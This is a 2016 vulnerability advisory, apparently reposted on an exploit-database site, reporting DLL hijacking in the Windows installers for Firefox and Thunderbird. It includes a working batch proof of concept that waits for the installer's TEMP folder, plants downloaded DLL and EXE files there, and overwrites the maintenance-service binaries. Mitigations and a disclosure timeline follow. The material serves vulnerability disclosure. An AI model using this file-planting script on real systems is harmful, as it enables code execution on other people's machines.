Mozilla Firefox DLL Hijacking

2016.06.16
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 6.9/10
Impact Subscore: 10/10
Exploitability Subscore: 3.4/10
Exploit range: Local
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Hi @ll, <https://bugzilla.mozilla.org/show_bug.cgi?id=961676> should have fixed CVE-2014-1520 in Mozilla's executable installers for Windows ... but does NOT! JFTR: this type of vulnerability (really: a bloody stupid trivial beginner's error!) is well-known and well-documented as <https://cwe.mitre.org/data/definitions/379.html>. Proof of concept/demonstration: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 0. download "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe", "Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe" and save them in an arbitrary directory; 1. download <http://home.arcor.de/skanthak/download/SHFOLDER.DLL> plus <http://home.arcor.de/skanthak/download/SENTINEL.EXE> and save them in an(other) arbitrary directory; 2. start your editor, copy and paste the following 10 lines and save them as "POC.CMD" in the same directory as "SHFOLDER.DLL" and "SENTINEL.EXE" downloaded in step 1: :WAIT1 @If Not Exist "%TEMP%\7z*.tmp" Goto :WAIT1 For /D %%! In ("%TEMP%\7z*.tmp") Do Set foobar=%%! Copy "%~dp0shfolder.dll" "%foobar%\shfolder.dll" :WAIT2 @If Not Exist "%foobar%\core\maintenanceservice.exe" Goto :WAIT2 Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice.exe" :WAIT3 @If Not Exist "%foobar%\core\maintenanceservice_installer.exe" Goto :WAIT3 Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice_installer.exe" 3. execute the batch script "POC.CMD" created in step 2; 4. execute "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe", "Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe" downloaded in step 0. and proceed as directed: notice the message boxed displayed from the copies of "SHFOLDER.DLL" and "SENTINEL.EXE" placed by the batch script started in step 3 in the unsafe TEMP subdirectory created by Mozilla's vulnerable executable installers! PWNED! Mitigation(s): ~~~~~~~~~~~~~~ 0. don't use executable installers. DUMP THEM, NOW! 1. see <http://home.arcor.de/skanthak/!execute.html> as well as <http://home.arcor.de/skanthak/SAFER.html>. 2. stay away from Mozilla's vulnerable installers for their Windows software (at least until Mozilla starts to develop a sense for the safety and security of their users). stay tuned Stefan Kanthak Timeline: ~~~~~~~~~ 2015-10-25 <https://bugzilla.mozilla.org/show_bug.cgi?id=1218199> not even an attempt to fix this vulnerability (check but <https://blog.mozilla.org/blog/2015/10/23/mozilla-launches-open-source-support-program/>) 2016-04-30 <https://bugzilla.mozilla.org/show_bug.cgi?id=1269111> <https://bugzilla.mozilla.org/show_bug.cgi?id=1269113> <https://bugzilla.mozilla.org/show_bug.cgi?id=1269122> <https://bugzilla.mozilla.org/show_bug.cgi?id=1269123> <https://bugzilla.mozilla.org/show_bug.cgi?id=1269142> <https://bugzilla.mozilla.org/show_bug.cgi?id=1269144> not even an attempt to fix this vulnerability (check but <https://blog.mozilla.org/blog/2016/06/09/help-make-open-source-secure/>) 2016-06-15 deadline expired after 45 days, report published


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top